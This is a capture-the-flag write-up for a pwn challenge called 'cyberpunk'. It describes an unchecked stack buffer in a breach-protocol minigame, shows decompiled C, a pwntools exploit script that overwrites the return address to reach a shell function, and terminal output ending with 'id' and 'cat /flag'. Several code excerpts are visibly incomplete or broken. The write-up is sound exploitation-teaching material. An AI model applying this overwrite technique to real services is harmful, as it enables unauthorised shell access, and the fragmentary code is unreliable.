

Wake the hack up, Samurai! We have a binary to pwn!

nc 31477

Attachment: cyberpunk

Team: Super Guesser

                                                       Cyberpunk 2021 Breach Protocol v.1.3
                                                        Q - Quit                H,? - Help
                                                        W - Up                    D - Right
                                                        S - Down                  A - Left
                                                  <Space> - Select          <Enter> - Continue
                                                         You have 90 seconds to break in

                                               [ 00  00  00  00  00  00  00  00 ]
                                                   BB   DF   2B   3D   56   B4 
                                                   1D   08   08   08   E0   B4 
                                                   3D   2B   3D   BB   B4   7F 
                                                   BB   F8   F8   E0   E0   7F 
                                                   56   7F   1D   BB   DF   5A 

The binary let’s us select multiple bytes in a cyberpunk hack manner to put together a code.

The issue here is, that it doesn’t do a boundary check on the length of the code and we can overwrite followup data by just continuing selecting values. After selecting one byte, the direction will toggle between horizontal and vertical selection, so we have to think a bit ahead, what and how we can overwrite.

Let’s take a look how the pad itself is initialized

int main(int argc, char **argv, char **env)
  unsigned int rand_val; 
  int fd;   
  char pad_values[0x28];
  rand_val = 0;

  fd = open("/dev/urandom", 0, env);

  if ( fd == -1 )
    return -1;

  if ( read(fd, &rand_val, 8) == 8 )

  memset(pad_values, 0, 0x28);
	return -1;

  return 0;

void shuffle_pad(char *pad_values)
  long cur_byte;
  for (int y = 0; y <= 5; ++y )
    for (int x = 0; x <= 5; ++x )
        if ((rand() & 1) != 0 )
          cur_byte = (long)shell;
          cur_byte = (long)&system;

        pad_values[6 * y + x] = cur_byte >> (8 * (char)(rand() % 8));
      while (!pad_values[6 * y + x]);

So, the available bytes in the pad will be from either shell or system address. This will be useful, since the application uses PIE.

void start_game(char *pad_values)
  char code[8];

  // Initilaize code
  for (int i = 0; i <= 7; ++i)
    code[i] = 0;

  handle_menu(code, pad_values);

As we can see, 8 bytes on the stack are available, but since we can stuff more into it, we’ll be able to overwrite the return address of this function (no canary).

We could probably guess the ASLR addresses from the keypad, but that’s not really needed at all, since the binary contains a shell function

void shell()
  execv("/bin/sh", 0LL);

And since the lowest 3 nibbles of every address will be fix even with ASLR, we can just overwrite the lower two bytes of the return address of start game to let it point to shell (0x000555555554b5a).

The lowest byte will always be 0x5a and the next byte is just the one from the pad, where the second nibble is 0xb.

Return address will be at &code + 16. After 16 key values the selection direction will be horizontal, so the attack plan will be:

  • Read all keypad values
  • Find a vertical line, which contains 0x5a and the byte that ends in 0xb
  • Select 16 random values (but only from other lines, to keep those for overwriting return address)
  • Select 0x5a
  • Select byte with 0xb nibble
  • Quit to trigger shell

Since it’s a CTF, I implemented the “game logic” in a quick&dirty way.

  • Select a cell, go down (until we find an available value and are not in winning line)
  • Select a cell, go right (until we find an available value and are not in winning line)
  • Rinse & repeat

This could be improved for sure, since this might not end up in the “winning line” all the time, but running it 2 or 3 times mostly ended up successfully, so should be good enough ;)

from pwn import *
import sys

LOCAL = True

HOST = ""
PORT = 31477
PROCESS = "./cyberpunk"

charset = "ABCDEF0123456789"
values = []
curX = 0
curY = 0

def parse_values():

  for i in range(6*6):
    ch = r.recv(1)
    while ch not in charset:
      ch = r.recv(1)

    V1 = ch + r.recv(1)

    values.append(int("0x"+V1, 16))

def go_down():
  global curX, curY

  curY += 1
  print r.recvuntil("$> ")

  curY = curY % 6
  curX = curX % 6

def go_right():
  global curX, curY

  curX += 1
  print r.recvuntil("$> ")

  curY = curY % 6
  curX = curX % 6

def select_cell():
  global curX, curY
  r.sendline(" ")	

  curY = curY % 6
  curX = curX % 6

  values[curY*6+curX] = -1

def exploit(r):
  global curX, curY

  r.recvuntil("break in\n")

  r.recvuntil("> ")

  # find line which contains 0x5a and 0xXB
  found = False

  for x in range(6):
    found5a = [-1, -1]
    foundXb = [-1, -1]
    for y in range(6):
      if values[y*6 + x] == 0x5a:
        found5a = [x, y]
      elif (values[y*6 + x] & 0xf) == 0xb:
        foundXb = [x, y]

    if found5a[1] != -1 and foundXb[1] != -1:"Found good line")
      found = True

  print found5a
  print foundXb

  if not found:

  # play 16 bytes and end up in line of found values
  curX = 0
  curY = 0
  direction = 2            # 1 = down 2 = right

  for i in range(16):

    if direction == 2:			

      while values[curY*6+curX] == -1:
      direction = 1
    elif direction == 1:

      while (values[curY*6+curX] == -1) or (curX == found5a[0]):

      direction = 2


if __name__ == "__main__":
  # e = ELF("./cyberpunk")

  if len(sys.argv) > 1:
    LOCAL = False
    r = remote(HOST, PORT)		
    LOCAL = True
    r = process("./cyberpunk")
    print (util.proc.pidof(r))

Running this, will hopefully select 16 random values and end up in our final line.

$ python 1
[+] Opening connection to on port 31477: Done
[*] Found good line
[3, 1]
[3, 5]

                                               [ 44  00  00  00  00  00  00  00 ]
                                                 │   │  55   7F   5A   7F   55 
                                                   7F   44   0B   5A   7E   0A 
                                                   44   55   0B   10   13   55 
                                                   13   10   7F   FE   FE   44 
                                                   7F   0A   FE   F8   F8   5A 
                                                   7E   10   13   0B   7E   0A 

                                               [ 44  00  00  00  00  00  00  00 ]
                                                   │    55   7F   5A   7F   55 
                                                 │#7F│  44   0B   5A   7E   0A 
                                                   44   55   0B   10   13   55 
                                                   13   10   7F   FE   FE   44 
                                                   7F   0A   FE   F8   F8   5A 
                                                   7E   10   13   0B   7E   0A 

                                               [ 44  7F  00  00  00  00  00  00 ]
                                                        55   7F   5A   7F   55 
                                                 ┤   ├──44───0B───5A───7E───0A─
                                                   44   55   0B   10   13   55 
                                                   13   10   7F   FE   FE   44 
                                                   7F   0A   FE   F8   F8   5A 
                                                   7E   10   13   0B   7E   0A 

                                               [ 44  7F  00  00  00  00  00  00 ]
                                                        55   7F   5A   7F   55 
                                                   44   55   0B   10   13   55 
                                                   13   10   7F   FE   FE   44 
                                                   7F   0A   FE   F8   F8   5A 
                                                   7E   10   13   0B   7E   0A 

                                               [ 44  7F  44  00  00  00  00  00 ]
                                                        55   7F   5A   7F   55 
                                                      │   │  0B   5A   7E   0A 
                                                   44   55   0B   10   13   55 
                                                   13   10   7F   FE   FE   44 
                                                   7F   0A   FE   F8   F8   5A 
                                                   7E   10   13   0B   7E   0A 


                                               [ 44  7F  44  55  0B  7F  FE  F8 ]
                                                        55   7F   5A   7F   55 
                                                             0B   5A   7E   0A 
                                                   44             10   13   55 
                                                   13   10        FE        44 
                                                 ──7F───0A───FE───F8─┤   ├──5A─
                                                   7E   10   13   0B   7E   0A 

                                               [ 44  7F  44  55  0B  7F  FE  F8 ]
                                                        55   7F   5A   7F   55 
                                                             0B   5A   7E   0A 
                                                   44             10   13   55 
                                                   13   10        FE        44 
                                                   7E   10   13   0B   7E   0A 

                                               [ 44  7F  44  55  0B  7F  FE  F8 ]
                                                        55   7F   5A   7F   55 
                                                             0B   5A   7E   0A 
                                                   44             10   13   55 
                                                   13   10        FE        44 
                                                   7F   0A   FE   F8      │   │
                                                   7E   10   13   0B   7E   0A 

                                               [ 44  7F  44  55  0B  7F  FE  F8 ]
                                                        55   7F   5A   7F   55 
                                                             0B   5A   7E   0A 
                                                   44             10   13   55 
                                                   13   10        FE        44 
                                                   7F   0A   FE   F8        │  
                                                   7E   10   13   0B   7E │#0A│
                                               [ 44  7F  44  55  0B  7F  FE  F8 ]
                                                 ─────�\x94\xa4   ├──7F───5A───7F───55─
                                                             0B   5A   7E   0A 
                                                                  10        55 
                                                   13   10        FE        44 
                                                   7F   0A   FE   F8           
                                                             13   0B           
                                               [ 44  7F  44  55  0B  7F  FE  F8 ]
                                                             0B   5A   7E   0A 
                                                                  10        55 
                                                   13   10        FE        44 
                                                   7F   0A   FE   F8           
                                                             13   0B

16 values are selected, we’re currently pointing to the LSB of the return address and we’re in a “good” line.

We now just have to select 0x5A and 0xB, which will make return address point to the shell function and quit the application.

                                               [ 44  7F  44  55  0B  7F  FE  F8 ]
                                                             0B   5A   7E   0A 
                                                                  10        55 
                                                   13   10        FE        44 
                                                   7F   0A   FE   F8           
                                                             13   0B           
                                                            $> $  
                                               [ 44  7F  44  55  0B  7F  FE  F8 ]
                                                             7F │   │  7F   55 
                                                             0B   5A   7E   0A 
                                                                  10        55 
                                                   13   10        FE        44 
                                                   7F   0A   FE   F8           
                                                             13   0B           
                                                            $> $ s
                                               [ 44  7F  44  55  0B  7F  FE  F8 ]
                                                             7F   │    7F   55 
                                                             0B │#5A│  7E   0A 
                                                                  10        55 
                                                   13   10        FE        44 
                                $ s
                   7F   0A   FE   F8           
                                                             13   0B           
                                                            $> $  

                                               [ 44  7F  44  55  0B  7F  FE  F8 ]
                                                             7F   │    7F   55 
                                                             0B   5A   7E   0A 
                                                                  10        55 
                                                   13   10        FE        44 
                                                   7F   0A   FE   F8           
                                                             13 │#0B│          
                                                            $> $  
                                               [ 44  7F  44  55  0B  7F  FE  F8 ]
                                                             7F        7F   55 
                                                             0B   5A   7E   0A 
                                                                  10        55 
                                                   13   10        FE        44 
                                                   7F   0A   FE   F8           
                                                 ────────────13─┤   ├──────────
                                                            $> $ q
$ id
uid=1000(samurai) gid=1000(samurai) groups=1000(samurai)
$ cat /flag